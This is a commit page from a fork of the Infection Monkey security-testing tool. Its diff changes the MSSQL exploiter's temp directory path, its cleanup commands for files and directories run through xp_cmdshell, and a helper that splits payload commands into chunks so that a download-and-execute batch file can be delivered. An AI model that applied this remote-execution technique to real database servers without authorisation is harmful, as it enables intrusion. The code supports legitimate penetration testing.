p59342861
/
monkey
forked from p15670423/monkey
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

Changed tmp dir path on mssql exploiter

This commit is contained in:
vakaris_zilius 2019-09-02 08:37:52 +00:00
parent 8c930fae66
commit b733cf3389
2 changed files with 14 additions and 11 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
monkey/infection_monkey/exploit/mssqlexec.py
View File

@ -11,7 +11,6 @@ from infection_monkey.exploit.tools.helpers import get_monkey_dest_path, get_tar
build_monkey_commandline, get_monkey_depth build_monkey_commandline, get_monkey_depth
from infection_monkey.model import DROPPER_ARG from infection_monkey.model import DROPPER_ARG
from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload from infection_monkey.exploit.tools.payload_parsing import LimitedSizePayload
import infection_monkey.utils
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
@ -28,7 +27,7 @@ class MSSQLExploiter(HostExploiter):
# Temporary file that saves commands for monkey's download and execution. # Temporary file that saves commands for monkey's download and execution.
TMP_FILE_NAME = 'tmp_monkey.bat' TMP_FILE_NAME = 'tmp_monkey.bat'
TMP_DIR_PATH = "C:\\windows\\temp\\monkey_dir" TMP_DIR_PATH = "%temp%\\tmp_monkey_dir"
MAX_XP_CMDSHELL_COMMAND_SIZE = 128 MAX_XP_CMDSHELL_COMMAND_SIZE = 128
@ -110,11 +109,10 @@ class MSSQLExploiter(HostExploiter):
self.run_file(tmp_file_path) self.run_file(tmp_file_path)
# Remove temporary dir we stored payload at # Remove temporary dir we stored payload at
if not infection_monkey.utils.get_monkey_dir_path() == MSSQLExploiter.TMP_DIR_PATH.lower(): tmp_file_removal_command = MSSQLLimitedSizePayload(command="del %s" % tmp_file_path)
tmp_file_removal_command = MSSQLLimitedSizePayload(command="del /f %s" % tmp_file_path) self.try_to_run_mssql_command(tmp_file_removal_command)
self.try_to_run_mssql_command(tmp_file_removal_command) tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir %s" % MSSQLExploiter.TMP_DIR_PATH)
tmp_dir_removal_command = MSSQLLimitedSizePayload(command="rmdir %s" % MSSQLExploiter.TMP_DIR_PATH) self.try_to_run_mssql_command(tmp_dir_removal_command)
self.try_to_run_mssql_command(tmp_dir_removal_command)
return True return True

13
monkey/infection_monkey/exploit/tools/payload_parsing.py
View File

@ -19,7 +19,12 @@ class Payload(object):
self.prefix = prefix self.prefix = prefix
self.suffix = suffix self.suffix = suffix
def get_full_payload(self, command=""): def get_payload(self, command=""):
"""
Returns prefixed and suffixed command (full payload)
:param command: Command to suffix/prefix. If no command is passed than objects' property is used
:return: prefixed and suffixed command (full payload)
"""
if not command: if not command:
command = self.command command = self.command
return "{}{}{}".format(self.prefix, command, self.suffix) return "{}{}{}".format(self.prefix, command, self.suffix)
@ -50,10 +55,10 @@ class LimitedSizePayload(Payload):
return False return False
elif self.command == "": elif self.command == "":
return [self.prefix+self.suffix] return [self.prefix+self.suffix]
wrapper = textwrap.TextWrapper(drop_whitespace=False, width=self.get_max_sub_payload_length())
commands = [self.get_full_payload(part) commands = [self.get_payload(part)
for part for part
in textwrap.wrap(self.command, self.get_max_sub_payload_length())] in wrapper.wrap(self.command)]
return commands return commands
def get_max_sub_payload_length(self): def get_max_sub_payload_length(self):